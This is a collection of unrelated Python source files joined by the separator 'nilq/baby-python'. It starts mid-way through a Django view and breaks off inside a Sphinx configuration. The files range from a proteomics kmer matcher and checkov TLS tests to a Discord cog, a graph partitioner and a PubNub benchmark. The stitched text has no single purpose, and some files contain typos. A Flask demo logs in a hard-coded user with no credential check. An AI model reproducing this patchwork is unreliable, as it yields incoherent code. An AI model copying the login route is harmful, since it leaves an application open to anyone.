    Raises:
        Http404: when no node matches the path, or a childless site section
            is requested by a non-admin.
    """
    # Hoisted: redirect_request() used to be evaluated twice per request.
    target = redirect_request(request)
    if target is not None:
        return target
    try:
        if request.path == '/':
            node = Node.objects.get(url='/home/', site=request.site)
        else:
            node = Node.objects.get(url=request.path, site=request.site)
    except Node.DoesNotExist:
        raise Http404('Page not found.')
    Model = apps.get_model(node.node_type, node.content_type)
    if node.pagelayout.namespace == 'site-section.html':
        # A section page redirects to its first published non-section child;
        # only site admins may view a childless section directly.
        first_child = (
            node
            .get_children()
            .filter(
                node_type='pages',
                content_type='page',
                deleted=0,
                published=1
            )
            .exclude(
                pagelayout__namespace='site-section.html'
            )
            .order_by('page__page__inline_order')
            .first()
        )
        if first_child:
            return redirect(first_child.url)
        if not commonfunctions.is_siteadmin(request):
            raise Http404('Page not found.')
    if node.pagelayout.namespace in _FILE_LISTING_LAYOUTS:
        return _render_file_listing(request, node, Model)
    if node.node_type == 'pages':
        return _render_page(request, node, Model)
    if node.node_type == 'documents':
        return _render_document(request, node, Model)
    if node.node_type == 'files':
        item = Model.objects.get(pk=node.pk)
        return _serve_stored_file(item, item.file_file)
    if node.node_type == 'images':
        item = Model.objects.get(pk=node.pk)
        return _serve_stored_file(item, item.image_file)
    if node.node_type == 'directoryentries':
        if node.content_type == 'schoolfaculty':
            return _render_schoolfaculty(request, node, Model)
    return HttpResponse(status=404)
nilq/baby-python
python
""" After implementation of DIP (Dependency Inversion Principle). The dependency (Database or CSV) is now injected in the Products class via a repository of type Database or CSV. A factory is used to create a Database or CSV repository. """ class ProductRepository: @staticmethod def select_products(): raise NotImplementedError class DatabaseProductRepository(ProductRepository): @staticmethod def select_products(): """Mock data retrieval from a database.""" return ['Laptop', 'Car'] class CSVProductRepository(ProductRepository): @staticmethod def select_products(): """Mock data retrieval from a CSV file.""" return ['TV', 'Radio'] class ProductFactory: @staticmethod def create(repo_type): if repo_type == 'DB': return DatabaseProductRepository() else: return CSVProductRepository() class Products: def __init__(self, repo: ProductRepository): self._products = [] self.repo = repo def get_products(self): self._products = self.repo.select_products() @property def products(self): return self._products if __name__ == '__main__': product_repo = ProductFactory.create('DB') products = Products(product_repo) products.get_products() print(products.products) product_repo = ProductFactory.create('CSV') products = Products(product_repo) products.get_products() print(products.products)
nilq/baby-python
python
## import os from setuptools import setup, find_namespace_packages from pkg_resources import get_distribution, DistributionNotFound def read(fname): return open(os.path.join(os.path.dirname(__file__), fname)).read() setup ( name = "namespace.HeardBox", use_scm_version = True, setup_requires=['setuptools_scm'], version = "0.0.1", author = "Conor Edwards", author_email = "conorlo@hotmail.co.uk", description = ("Interface the Heard Proteomic Database with Python"), url = "http://wwww.github.com/ConorEd/HeardBox", # packages['HeardBox', 'tests'], #license = "BSD", keywords = "Uniprot Excel Interface, Bioinformatics, Quality of life improvement, BLAST, ALIGN, GO, Excel", long_description=read("README.txt"), classifiers=[ "Development Sttus :: 2 - Pre-Alpha", "Topic :: Science", "License :: OSI Approved :: BSD License", ], package_dir={'': 'src'}, packages=find_namespace_packages(where='src'), install_requires=['xlwings', 'biopython', 'uniprot_tools'], entry_points={ 'console_scripts': [ 'main = HeardBox.main:main_func', #'ext_mod = HeardBox._mod:some_func', ] } ) #├── setup.py #├── src #│ └── namespace #│ └── mypackage #│ ├── __init__.py #│ └── mod1.py #└── tests # └── test_mod1.py
nilq/baby-python
python
"""Regression.""" from ._linear_regression import LinearRegression from ._neighbors_regression import ( KNeighborsRegressor, RadiusNeighborsRegressor, )
nilq/baby-python
python
#!/usr/bin/python #-*- coding: utf-8 -*- # >.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>. # Licensed under the Apache License, Version 2.0 (the "License") # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # --- File Name: parser.py # --- Creation Date: 24-02-2020 # --- Last Modified: Tue 25 Feb 2020 16:26:55 AEDT # --- Author: Xinqi Zhu # .<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.< """ Parser for VP metrics """ import argparse def init_parser(): parser = argparse.ArgumentParser(description='VP metrics.') parser.add_argument('--result_dir', help='Results directory.', type=str, default='/mnt/hdd/repo_results/VP-metrics-pytorch') parser.add_argument('--data_dir', help='Dataset directory.', type=str, default='/mnt/hdd/Datasets/test_data') parser.add_argument('--no_gpu', help='Do not use GPUs.', action='store_true') parser.add_argument('--in_channels', help='Num channels for model input.', type=int, default=6) parser.add_argument('--out_dim', help='Num output dimension.', type=int, default=7) parser.add_argument('--lr', help='Learning rate.', type=float, default=0.01) parser.add_argument('--batch_size', help='Batch size.', type=int, default=32) parser.add_argument('--epochs', help='Num epochs to train.', type=int, default=60) parser.add_argument('--input_mode', help='Input mode for model.', type=str, default='concat', choices=['concat', 'diff']) parser.add_argument('--test_ratio', help='Test set ratio.', type=float, default=0.5) parser.add_argument('--workers', help='Num workers.', type=int, default=4) return parser
nilq/baby-python
python
# Generated by Django 3.2.6 on 2021-08-27 19:20 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('university', '0006_representative'), ] operations = [ migrations.AddField( model_name='course', name='slug_unimi', field=models.CharField(max_length=200, null=True, unique=True), ), migrations.AlterField( model_name='department', name='name', field=models.CharField(max_length=128, unique=True, verbose_name='name'), ), migrations.AlterUniqueTogether( name='degree', unique_together={('name', 'type')}, ), ]
nilq/baby-python
python
from utils import hashable_boundaries, predicted_len
from objects import Database
from collections import defaultdict
from math import ceil
import gen_spectra


def modified_sort_masses_in_sorted_keys_b(db_dict_b, mz, kmer_list_b):
    """Append every b-ion kmer entry stored under *mz* to *kmer_list_b*."""
    kmers = db_dict_b[mz]
    kmer_list_b += kmers


def modified_sort_masses_in_sorted_keys_y(db_dict_y, mz, kmer_list_y):
    """Append every y-ion kmer entry stored under *mz* to *kmer_list_y*."""
    kmers = db_dict_y[mz]
    kmer_list_y += kmers


def handle_sorting_keys(db_dict_b, db_dict_y, kmer_list):
    """Flatten both ion dictionaries into *kmer_list*, walking masses in
    ascending order (b ions first, then y ions)."""
    for mz in sorted(db_dict_b.keys()):
        modified_sort_masses_in_sorted_keys_b(db_dict_b, mz, kmer_list)
    for mz in sorted(db_dict_y.keys()):
        modified_sort_masses_in_sorted_keys_y(db_dict_y, mz, kmer_list)


def modified_add_all(kmer, prot_name, db_dict_b, db_dict_y, kmer_set,
                     start_location, end_location, protein_number):
    """Record every singly/doubly charged b- and y-ion mass of *kmer*.

    Each mass maps to a tuple
    (mz, protein_number, fragment, 'start-end', ion, charge); b-ion fragments
    are prefixes of *kmer*, y-ion fragments are suffixes. *kmer_set* collects
    fragment -> protein-name occurrences.
    """
    for ion in 'by':
        for charge in [1, 2]:
            pre_spec = gen_spectra.gen_spectrum(kmer, ion=ion, charge=charge)
            spec = pre_spec
            if isinstance(pre_spec, dict):
                spec = pre_spec.get('spectrum')
            for i, mz in enumerate(spec):
                start_position = start_location if ion == 'b' else end_location
                end_position = start_position + i if ion == 'b' else end_location - i
                kmer_to_add = kmer[:i + 1] if ion == 'b' else kmer[-i - 1:]
                r_d = db_dict_b if ion == 'b' else db_dict_y
                if ion == 'b':
                    r_d[mz].add((mz, protein_number, kmer_to_add,
                                 str(start_position) + '-' + str(end_position),
                                 ion, charge))
                else:
                    # y ions are reported end-to-start.
                    r_d[mz].add((mz, protein_number, kmer_to_add,
                                 str(end_position) + '-' + str(start_position),
                                 ion, charge))
                kmer_set[kmer_to_add].append(prot_name)


def make_database_set_for_protein(i, plen, max_len, prot_entry, prot_name,
                                  db_dict_b, db_dict_y, kmer_set):
    """Index one protein: prefixes, interior windows, then suffixes.

    BUGFIX: the window length is clamped to the protein length; previously a
    protein shorter than *max_len* produced negative range bounds and
    nonsense negative-index slices with wrong positions.
    """
    print(f'\rOn protein {i+1}/{plen} [{int((i+1) * 100 / plen)}%]', end='')
    seq = prot_entry.sequence
    window = min(max_len, len(seq))
    # Prefixes shorter than the window (positions are 1-based).
    for j in range(1, window):
        modified_add_all(seq[:j], prot_name, db_dict_b, db_dict_y, kmer_set,
                         1, j, i)
    # Full-length interior windows; the final window is covered by the
    # suffix pass below, matching the original loop bounds.
    for j in range(0, len(seq) - window):
        modified_add_all(seq[j:j + window], prot_name, db_dict_b, db_dict_y,
                         kmer_set, j + 1, j + window, i)
    # Suffixes of at most *window* residues.
    for j in range(len(seq) - window, len(seq)):
        modified_add_all(seq[j:], prot_name, db_dict_b, db_dict_y, kmer_set,
                         j + 1, len(seq), i)


def make_database_set_for_proteins(proteins, max_len, db_dict_b, db_dict_y, kmer_set):
    """Index every (name, entry) pair in *proteins*."""
    plen = len(proteins)
    for i, (prot_name, prot_entry) in enumerate(proteins):
        make_database_set_for_protein(i, plen, max_len, prot_entry, prot_name,
                                      db_dict_b, db_dict_y, kmer_set)


def modified_make_database_set(proteins: list, max_len: int):
    """Build the flat, mass-sorted kmer entry list plus the
    fragment -> protein-names map for *proteins*."""
    db_dict_b = defaultdict(set)
    db_dict_y = defaultdict(set)
    kmer_set = defaultdict(list)
    make_database_set_for_proteins(proteins, max_len, db_dict_b, db_dict_y, kmer_set)
    print('\nSorting the set of protein masses...')
    kmer_list = []
    handle_sorting_keys(db_dict_b, db_dict_y, kmer_list)
    kmer_list = sorted(kmer_list, key=lambda x: x[0])
    print('Sorting the set of protein masses done')
    return kmer_list, kmer_set


def in_bounds(int1, interval):
    """Return True when *int1* lies inside the closed interval [lo, hi]."""
    return interval[0] <= int1 <= interval[1]


def modified_merge(kmers, boundaries: dict):
    """Two-pointer merge of mass-sorted *kmers* against the sorted boundary
    intervals in *boundaries*.

    Returns (matched_masses_b, matched_masses_y): hashable boundary ->
    list of kmer tuples whose mass falls inside that boundary.
    """
    matched_masses_b, matched_masses_y = defaultdict(list), defaultdict(list)
    mz_mapping = dict()
    for i, mz in enumerate(boundaries):
        mz_mapping[i] = boundaries[mz]
    boundary_index, kmer_index, starting_point = 0, 0, 0
    while (boundary_index < len(boundaries)) and (kmer_index < len(kmers)):
        target_kmer = kmers[kmer_index]
        target_boundary = mz_mapping[boundary_index]
        if in_bounds(target_kmer[0], target_boundary):
            hashable_boundary = hashable_boundaries(target_boundary)
            if target_kmer[4] == 'b':
                matched_masses_b[hashable_boundary].append(target_kmer)
            if target_kmer[4] == 'y':
                matched_masses_y[hashable_boundary].append(target_kmer)
            # BUGFIX: advance unconditionally -- the original only advanced
            # inside the 'b'/'y' branches, which would loop forever on an
            # entry with any other ion tag.
            kmer_index = kmer_index + 1
        elif target_kmer[0] < target_boundary[0]:
            # Mass below the current window can never match a later window.
            kmer_index = kmer_index + 1
            starting_point = starting_point + 1
        else:
            # Mass above the window: advance the boundary and rewind the
            # kmers to the first still-relevant entry.
            boundary_index = boundary_index + 1
            kmer_index = starting_point
    return matched_masses_b, matched_masses_y


def modified_match_masses_per_protein(kv_prots, max_len, boundaries, kmer_set):
    """Build the kmer database for *kv_prots* and merge it against
    *boundaries*.

    NOTE: *kmer_set* is rebuilt internally; the passed-in value is ignored
    (kept in the signature for backward compatibility).
    """
    extended_kv_prots = [(k, entry) for (k, v) in kv_prots for entry in v]
    kmers, kmer_set = modified_make_database_set(extended_kv_prots, max_len)
    matched_masses_b, matched_masses_y = modified_merge(kmers, boundaries)
    return matched_masses_b, matched_masses_y, kmer_set


def modified_match_masses(boundaries: dict, db: Database, max_pep_len: int):
    """Top-level entry: match every protein in *db* against *boundaries*.

    The peptide length cap is the smaller of *max_pep_len* and the longest
    peptide that could fit under the largest boundary (57.021464 Da is the
    glycine residue mass, the lightest residue).
    """
    max_boundary = max(boundaries.keys())
    estimated_max_len = ceil(boundaries[max_boundary][1] / 57.021464)
    max_len = min(estimated_max_len, max_pep_len)
    kv_prots = [(k, v) for k, v in db.proteins.items()]
    matched_masses_b, matched_masses_y, kmer_set = modified_match_masses_per_protein(
        kv_prots, max_len, boundaries, db)
    return (matched_masses_b, matched_masses_y, kmer_set)


def check_for_y_kmers(kmers):
    """Debug helper: print the index of every y-ion entry in *kmers*."""
    for i, kmer in enumerate(kmers):
        if kmer[4] == 'y':
            print("FOUND at:", i, kmer)
nilq/baby-python
python
"""This module contains the support resources for the two_party_negotiation protocol."""
nilq/baby-python
python
""" Manages updateing info-channels (Currently only `log` channel) """ from typing import Union import discord from discord.ext import commands class InfoChannels(commands.Cog): def __init__(self, bot: commands.Bot): print('Loading InfoChannels module...', end='') self.bot = bot self.guild_config_cog = bot.get_cog('GuildConfigCog') self.allowed_mentions = discord.AllowedMentions(everyone=False, users=False, roles=False) print(' Done') @commands.Cog.listener() async def on_member_ban(self, guild: discord.Guild, user: Union[discord.User, discord.Member]): guild_config = await self.guild_config_cog.get_guild(guild) log_channel = await guild_config.get_log_channel() if log_channel: await log_channel.send('{} was banned'.format(str(user))) @commands.Cog.listener() async def on_member_unban(self, guild: discord.Guild, user: discord.User): guild_config = await self.guild_config_cog.get_guild(guild) log_channel = await guild_config.get_log_channel() if log_channel: await log_channel.send('{} was unbanned'.format(str(user))) def setup(bot: commands.Bot): bot.add_cog(InfoChannels(bot))
nilq/baby-python
python
print(""" 042) Refaça o DESAFIO 035 dois triângulos, acrescentando o recurso de mostrar que tipo de triângulo será formado: - Equilátero: todos os lados iguais - Isósceles: dois lados iguais - Escaleno: todos os lados diferentes """) print(""" Este programa recebe o valor de três retas e verifica se, com elas, é possível formar um triângulo. Para isso é importante saber que a a soma de quaisquer dois lados de um triângulo deve, SEMPRE, ser maior que o terceiro lado restante. """) L1 = float(input('Digite o comprimento da primeira reta: ')) L2 = float(input('Digite o comprimento da segunda reta: ')) L3 = float(input('Digite o comprimento da terceira reta: ')) if L1 < L2 + L3 and L2 < L1 + L3 and L3 < L1 + L2: print('Os segmentos formam um triângulo: ') if L1 == L2 == L3: print('O triângulo possui os três lados iguais, portanto ele é EQUILÁTERO') elif L1 == L2 or L1 == L3 or L2 == L3: print('O triângulo possui dois lados iguais, portanto ele é ISÓSCELES') else: print('O triângulo possui dos três lados diferentes, porém ele é ESCALENO') else: print('Os segmentos não formam um triângulo')
nilq/baby-python
python
import unittest import hcl2 from checkov.common.models.enums import CheckResult from checkov.terraform.checks.resource.aws.AppLoadBalancerTLS12 import check class TestAppLoadBalancerTLS12(unittest.TestCase): def test_failure(self): resource_conf = {'load_balancer_arn': ['${aws_lb.examplea.arn}'], 'port': ['443'], 'protocol': ['HTTPS'], 'ssl_policy': ["ELBSecurityPolicy-2016-08"], 'default_action': [{'type': ['forward'], 'target_group_arn': ['${aws_lb_target_group.examplea.arn}'] }]} scan_result = check.scan_resource_conf(conf=resource_conf) self.assertEqual(CheckResult.FAILED, scan_result) def test_success(self): resource_conf = { 'load_balancer_arn': [ '${aws_lb.examplea.arn}' ], 'port': ['443'], 'protocol': ['HTTPS'], 'ssl_policy': ["ELBSecurityPolicy-TLS-1-2-2017-01"], 'default_action': [ { 'type': ['forward'], 'target_group_arn': [ '${aws_lb_target_group.examplea.arn}' ] } ] } scan_result = check.scan_resource_conf(conf=resource_conf) self.assertEqual(CheckResult.PASSED, scan_result) def test_nlb_tls_success(self): resource_conf = { 'load_balancer_arn': [ '${aws_lb.example.arn}' ], 'port': ['443'], 'protocol': ['TLS'], 'ssl_policy': ["ELBSecurityPolicy-FS-1-2-Res-2019-08"], 'default_action': [ { 'type': ['forward'], 'target_group_arn': [ '${aws_lb_target_group.example.arn}' ] } ] } scan_result = check.scan_resource_conf(conf=resource_conf) self.assertEqual(CheckResult.PASSED, scan_result) def test_redirect(self): hcl_res = hcl2.loads(""" resource "aws_lb_listener" "http" { load_balancer_arn = aws_lb.public.arn port = "80" protocol = "HTTP" default_action { redirect { port = "443" protocol = "HTTPS" status_code = "HTTP_301" } type = "redirect" } } """) resource_conf = hcl_res['resource'][0]['aws_lb_listener']['http'] scan_result = check.scan_resource_conf(conf=resource_conf) self.assertEqual(CheckResult.PASSED, scan_result) if __name__ == '__main__': unittest.main()
nilq/baby-python
python
class Solution: def longestValidParenthesesSlow(self, s: str) -> int: stack, ans = [-1], 0 for i in range(len(s)): if s[i] == ")" and len(stack) > 1 and s[stack[-1]] == "(": stack.pop() ans = max(ans, i - stack[-1]) else: stack.append(i) return ans def longestValidParenthesesFast(self, s: str) -> int: left, right, ans = 0, 0, 0 for c in s: if c == "(": left += 1 else: right += 1 if left == right: ans = max(ans, right * 2) elif left < right: left, right = 0, 0 left, right = 0, 0 for c in s[::-1]: if c == "(": left += 1 else: right += 1 if left == right: ans = max(ans, left * 2) elif left > right: left, right = 0, 0 return ans # TESTS for s, expected in [ ("(()", 2), (")()())", 4), ("", 0), ("()(()", 2), ("()(())", 6), ("((()()", 4), ("((())", 4), ("))(())", 4), ("()(()()", 4), ]: sol = Solution() actual1 = sol.longestValidParenthesesSlow(s) actual2 = sol.longestValidParenthesesFast(s) print("Longest valid parentheses in", s, "->", actual1) assert actual1 == expected and actual2 == expected
nilq/baby-python
python
from flask import Flask, redirect
from flask_fileupload import FlaskFileUpload
from flask_login import LoginManager, UserMixin, login_user, logout_user

# Application wiring happens at import time: configuration is read from a
# top-level ``config`` module, then the login and file-upload extensions are
# bound to the app.
app = Flask(__name__)
app.config.from_object("config")
lm = LoginManager(app)
fue = FlaskFileUpload(app)


class User(UserMixin):
    """Minimal flask-login user: an identity only, with no backing store."""

    def __init__(self, user_id):
        # flask-login reads this via UserMixin.get_id().
        self.id = user_id


@lm.user_loader
def load_user(user_id):
    """Rebuild a User from the id flask-login stored in the session."""
    return User(user_id)


@app.route("/login/")
def login():
    """Log in a hard-coded demo user and send them to the upload page.

    NOTE(review): there is no credential check here — presumably demo-only;
    confirm before any real deployment.
    """
    user = User("testuser")
    login_user(user)
    return redirect("/upload")


@app.route("/logout/")
def logout():
    """Clear the login session and return to the index page."""
    logout_user()
    return redirect("/")
nilq/baby-python
python
""" This module implements graph/sparse matrix partitioning inspired by Gluon. The goal of this module is to allow simple algorithms to be written against the current sequential implementation, and eventually scale (without changes) to parallel or even distributed partitioning. As such, many functions guarantee much less than they currently provide (e.g., `~PartitioningAlgorithm.get_edge_master` is only guaranteed to see it's source and destination in `~PartitioningAlgorithm.vertex_masters` even though the initial sequential implementation will actually provide all masters.) The partitioner uses two functions getVertexMaster and getEdgeMaster similar to those used by Gluon, but also provides access to vertex attributes like position. The `~PartitioningAlgorithm.get_vertex_master` function selects the master based on vertex attributes or more typical graph properties. The `~PartitioningAlgorithm.get_edge_master` function selects the master based on edge properties and the masters selected for the endpoints. The partitioner also takes a `~PartitioningAlgorithm.neighborhood_size` parameter which specifies how far away from each vertex proxies are needed. Edge proxies are included for all edges between vertices present on each node (either as master or as a proxy). This module will work just like normal Gluon if neighborhood size is 1. For vertex position based partitioning, we can just assign the node masters based on position and set an appropriate neighborhood. For your sweeps algorithm, set neighborhood size to 2 and assign masters as needed. 
""" from abc import abstractmethod, ABCMeta, abstractproperty from collections import namedtuple from typing import Sequence, Set # FIXME: This load of numpy will cause problems if it needs to be multiloaded # from parla import multiload # with multiload(): import numpy as np import scipy.sparse __all__ = [ "VertexID", "PartitionID", "GraphProperties", "PartitioningAlgorithm" ] VertexID = int PartitionID = int class GraphProperties: def __init__(self, A: scipy.sparse.spmatrix): """ Compute the graph properties of `A`. This is called by the `PartitioningAlgorithm` framework. """ assert A.shape[0] == A.shape[1], "Parla only support partitioning homogeneous graphs with square edge matrices." self.A = A """ The edge matrix of the graph. """ self.n_vertices = A.shape[0] """ The number of vertices. """ self.n_edges = A.count_nonzero() """ The number of edges. """ nonzeros = (A != 0) # TODO: There MUST be a better way to do this. self.in_degree = nonzeros.sum(0).A.flatten() """ A dense array containing the in degree of each vertex. """ self.out_degree = nonzeros.sum(1).A.flatten() """ A dense array containing the out degree of each vertex. """ class Partition(namedtuple("Partition", ("edges", "vertex_global_ids", "vertex_masters", "edge_masters"))): """ An instance of `Partition` contains all of the data available to a specific partition. """ edges: scipy.sparse.spmatrix """ A sparse matrix containing all edges in this partition (both master copies and proxies). """ vertex_global_ids: np.ndarray """ A dense array of the global IDs of each vertex which is available locally (as a master copy or a proxy). In other words, this array is a mapping from local ID to global ID for all vertices what exist locally. The global IDs are always in ascending order. """ vertex_masters: np.ndarray """ An array of the master partitions for every vertex. """ edge_masters: scipy.sparse.spmatrix """ A sparse matrix of the master partitions for all locally available edges. 
The structure of this sparse matrix is identical to `edges`. """ class PartitioningAlgorithm(metaclass=ABCMeta): graph_properties: GraphProperties """ The `GraphProperties` of the graph bring partitioned. What data is available in it depends on the context in which it is accessed. """ vertex_masters: np.ndarray """ The vertex masters that have already been assigned. This data structure is not sequential consistent. See `get_vertex_master` and `get_edge_master` for information about what elements are guaranteed to be up to date during those calls. """ # ... user-defined state ... @abstractproperty def n_partitions(self) -> int: """ :return: The number of partitions this partitioner will create. (All partition IDs must be 0 < id < `n_partitions`) """ pass @abstractproperty def neighborhood_size(self) -> int: """ :return: The number of neighboring proxy vertices to include in each partition. Must be >= 0. A value of 0 will result in no proxies at all. """ pass @abstractmethod def get_vertex_master(self, vertex_id: VertexID) -> PartitionID: """ Compute the master partition ID for a vertex. This function may use `graph_properties` and the metadata of the specific vertex. :param vertex_id: The global ID of the vertex. :return: The master partition ID for the vertex. """ pass @abstractmethod def get_edge_master(self, src_id: VertexID, dst_id: VertexID) -> PartitionID: """ Compute the master partition ID for the specified edge. This function may use `vertex_masters`, but the only elements guaranteed to be present are `src_id` and `dst_id`. This function may use `graph_properties` freely. :param src_id: The global ID of the source vertex :param dst_id: The global ID of the target vertex :return: The master partition ID for the edge. """ pass def partition(self, A: scipy.sparse.spmatrix, edge_matrix_type=scipy.sparse.csr_matrix) -> Sequence[Partition]: """ Partition `A`. This operation mutates `self` and hence is not thread-safe. 
Some implementation of this may be internally parallel. :param A: The complete sparse edge matrix. :param edge_matrix_type: The type of edge matrix to build for each partition. This is used for both `Partition.edges` and `Partition.edge_masters`. :return: A sequence of `Partition` objects in ID order. """ n_parts = self.n_partitions neighborhood_size = self.neighborhood_size self.graph_properties = GraphProperties(A) self.vertex_masters = np.empty(shape=(self.graph_properties.n_vertices,), dtype=int) self.vertex_masters[:] = -1 edge_masters = scipy.sparse.csr_matrix(A.shape, dtype=int) partition_vertices: Sequence[Set[int]] = [set() for _ in range(n_parts)] # partition_n_edges = np.zeros(shape=(n_parts,), dtype=int) n, m = A.shape assert n == m, "Parla only support partitioning homogeneous graphs with square edge matrices." # Assign vertex masters for i in range(n): master = self.get_vertex_master(i) assert master >= 0 and master < n_parts, f"partition {master} is invalid ({n_parts} partitions)" self.vertex_masters[i] = master # TODO: This does not yet implement neighborhood > 1 # Assign edge owners # TODO:PERFORMANCE: Iterate values without building index lists? for (i, j) in zip(*A.nonzero()): owner = self.get_edge_master(i, j) assert owner >= 0 and owner < n_parts, f"partition {owner} is invalid ({n_parts} partitions)" # partition_n_edges[owner] += 1 partition_vertices[owner].add(i) partition_vertices[owner].add(j) # Build id maps partition_global_ids = [np.array(sorted(vs)) for vs in partition_vertices] # Construct in a efficiently updatable form (LiL) # TODO:PERFORMANCE: It would be more efficient to build directly in CSR or the appropriate output format. 
partition_edges = [scipy.sparse.lil_matrix((m.shape[0], m.shape[0])) for m in partition_global_ids] for (i, j) in zip(*A.nonzero()): owner = self.get_edge_master(i, j) assert owner >= 0 and owner < n_parts, f"partition {owner} is invalid ({n_parts} partitions)" global_ids = partition_global_ids[owner] # TODO:PERFORANCE: Use a reverse index? partition_edges[owner][global_ids.searchsorted(i), global_ids.searchsorted(j)] = A[i, j] # Convert to compressed form return [Partition(edge_matrix_type(edges), global_ids, self.vertex_masters, edge_masters) for edges, global_ids in zip(partition_edges, partition_global_ids)]
nilq/baby-python
python
## www.pubnub.com - PubNub Real-time push service in the cloud.
# coding=utf8

## PubNub Real-time Push APIs and Notifications Framework
## Copyright (c) 2010 Stephen Blum
## http://www.pubnub.com/

## -----------------------------------
## PubNub 3.1 Real-time Push Cloud API
## -----------------------------------

# Benchmark script: publishes messages to itself on a throwaway channel and
# tracks how many round-trip, printing delivery statistics once per second.
import sys
import datetime
import time
import math  # NOTE(review): unused import
from pubnub import PubnubTwisted as Pubnub

## -----------------------------------------------------------------------
## Configuration
## -----------------------------------------------------------------------
# Positional CLI arguments, each falling back to 'demo' / defaults.
publish_key = len(sys.argv) > 1 and sys.argv[1] or 'demo'
subscribe_key = len(sys.argv) > 2 and sys.argv[2] or 'demo'
secret_key = len(sys.argv) > 3 and sys.argv[3] or 'demo'
cipher_key = len(sys.argv) > 4 and sys.argv[4] or 'demo'
ssl_on = len(sys.argv) > 5 and bool(sys.argv[5]) or False
origin = len(sys.argv) > 6 and sys.argv[6] or 'pubsub.pubnub.com'
# NOTE(review): the CLI-supplied origin is immediately overwritten by this
# hard-coded IP — presumably a leftover test override; confirm.
origin = '184.72.9.220'

## -----------------------------------------------------------------------
## Analytics
## -----------------------------------------------------------------------
analytics = {
    'publishes': 0,             # Total Send Requests
    'received': 0,              # Total Received Messages (Deliveries)
    'queued': 0,                # Total Unreceived Queue (UnDeliveries)
    'successful_publishes': 0,  # Confirmed Successful Publish Request
    'failed_publishes': 0,      # Confirmed UNSuccessful Publish Request
    'failed_deliveries': 0,     # (successful_publishes - received)
    'deliverability': 0         # Percentage Delivery
}
# Per-second receive counters keyed by timestamp string, plus rolling stats.
trips = {
    'last': None,
    'current': None,
    'max': 0,
    'avg': 0
}

## -----------------------------------------------------------------------
## Initiate Class
## -----------------------------------------------------------------------
# Unique channel per run so stale messages from earlier runs don't pollute
# the numbers.
channel = 'deliverability-' + str(time.time())
pubnub = Pubnub(
    publish_key,
    subscribe_key,
    secret_key=secret_key,
    cipher_key=cipher_key,
    ssl_on=ssl_on,
    origin=origin
)

## -----------------------------------------------------------------------
## BENCHMARK
## -----------------------------------------------------------------------
def publish_sent(info=None):
    """Publish-completion callback: tally success/failure, then schedule
    the next send after 100ms."""
    if info and info[0]:
        analytics['successful_publishes'] += 1
    else:
        analytics['failed_publishes'] += 1
    analytics['publishes'] += 1
    analytics['queued'] += 1
    pubnub.timeout(send, 0.1)


def send():
    """Publish one probe message; back off for 10s when the unreceived
    backlog exceeds 100."""
    if analytics['queued'] > 100:
        analytics['queued'] -= 10
        return pubnub.timeout(send, 10)
    pubnub.publish({
        'channel': channel,
        'callback': publish_sent,
        'message': "1234567890"
    })


def received(message):
    """Subscribe callback: count the delivery into the current 1-second
    bucket and update max/avg trip rates."""
    analytics['queued'] -= 1
    analytics['received'] += 1
    # Bucket keys are second-resolution timestamp strings.
    current_trip = trips['current'] = str(datetime.datetime.now())[0:19]
    last_trip = trips['last'] = str(
        datetime.datetime.now() - datetime.timedelta(seconds=1)
    )[0:19]

    ## New Trip Span (1 Second)
    if current_trip not in trips:
        trips[current_trip] = 0

    ## Average
    # NOTE(review): under Python 2 this is integer division — the average
    # is truncated; confirm whether that is intended.
    if last_trip in trips:
        trips['avg'] = (trips['avg'] + trips[last_trip]) / 2

    ## Increment Trip Counter
    trips[current_trip] = trips[current_trip] + 1

    ## Update Max
    if trips[current_trip] > trips['max']:
        trips['max'] = trips[current_trip]


def show_status():
    """Recompute derived stats and print one status line; reschedules
    itself every second."""
    ## Update Failed Deliveries
    analytics['failed_deliveries'] = \
        analytics['successful_publishes'] \
        - analytics['received']

    ## Update Deliverability
    analytics['deliverability'] = (
        float(analytics['received']) /
        float(analytics['successful_publishes'] or 1.0)
    ) * 100.0

    ## Print Display
    # NOTE(review): the 'publishes' key appears twice in this dict literal;
    # the second entry silently wins.
    print((
        "max:%(max)03d/sec " +
        "avg:%(avg)03d/sec " +
        "pubs:%(publishes)05d " +
        "received:%(received)05d " +
        "spub:%(successful_publishes)05d " +
        "fpub:%(failed_publishes)05d " +
        "failed:%(failed_deliveries)05d " +
        "queued:%(queued)03d " +
        "delivery:%(deliverability)03f%% " +
        ""
    ) % {
        'max': trips['max'],
        'avg': trips['avg'],
        'publishes': analytics['publishes'],
        'received': analytics['received'],
        'successful_publishes': analytics['successful_publishes'],
        'failed_publishes': analytics['failed_publishes'],
        'failed_deliveries': analytics['failed_deliveries'],
        'publishes': analytics['publishes'],
        'deliverability': analytics['deliverability'],
        'queued': analytics['queued']
    })
    pubnub.timeout(show_status, 1)


def connected():
    """Subscribe-established callback: start the status ticker and the
    first send."""
    show_status()
    pubnub.timeout(send, 1)


print("Connected: %s\n" % origin)
pubnub.subscribe({
    'channel': channel,
    'connect': connected,
    'callback': received
})

## -----------------------------------------------------------------------
## IO Event Loop
## -----------------------------------------------------------------------
pubnub.start()
nilq/baby-python
python
# Configuration file for the Sphinx documentation builder. # # For a full list of configuration options, see the documentation: # http://www.sphinx-doc.org/en/master/usage/configuration.html # Project information # -------------------------------------------------- project = 'Apollo' version = '0.2.0' release = '' copyright = '2018, Georgia Power Company' author = 'Chris Barrick, Zach Jones, Fred Maier' # Configuration # -------------------------------------------------- needs_sphinx = '1.7' # v1.7.0 was released 2018-02-12 master_doc = 'index' language = 'en' pygments_style = 'sphinx' templates_path = ['_templates'] source_suffix = ['.rst'] exclude_patterns = ['_build', '_static', 'Thumbs.db', '.DS_Store'] extensions = [ 'sphinx.ext.autodoc', 'sphinx.ext.autosummary', 'sphinx.ext.coverage', 'sphinx.ext.doctest', 'sphinx.ext.githubpages', 'sphinx.ext.ifconfig', 'sphinx.ext.intersphinx', 'sphinx.ext.mathjax', 'sphinx.ext.napoleon', 'sphinx.ext.todo', 'sphinx.ext.viewcode', ] # Theme # -------------------------------------------------- html_theme = 'sphinx_rtd_theme' html_logo = '_static/logo/apollo-logo-text-color.svg' html_static_path = ['_static'] html_css_files = ['css/overrides.css'] # Theme specific, # see https://sphinx-rtd-theme.readthedocs.io/en/latest/configuring.html html_theme_options = { 'logo_only': True, 'display_version': True, 'style_nav_header_background': '#EEEEEE', # Sidebar 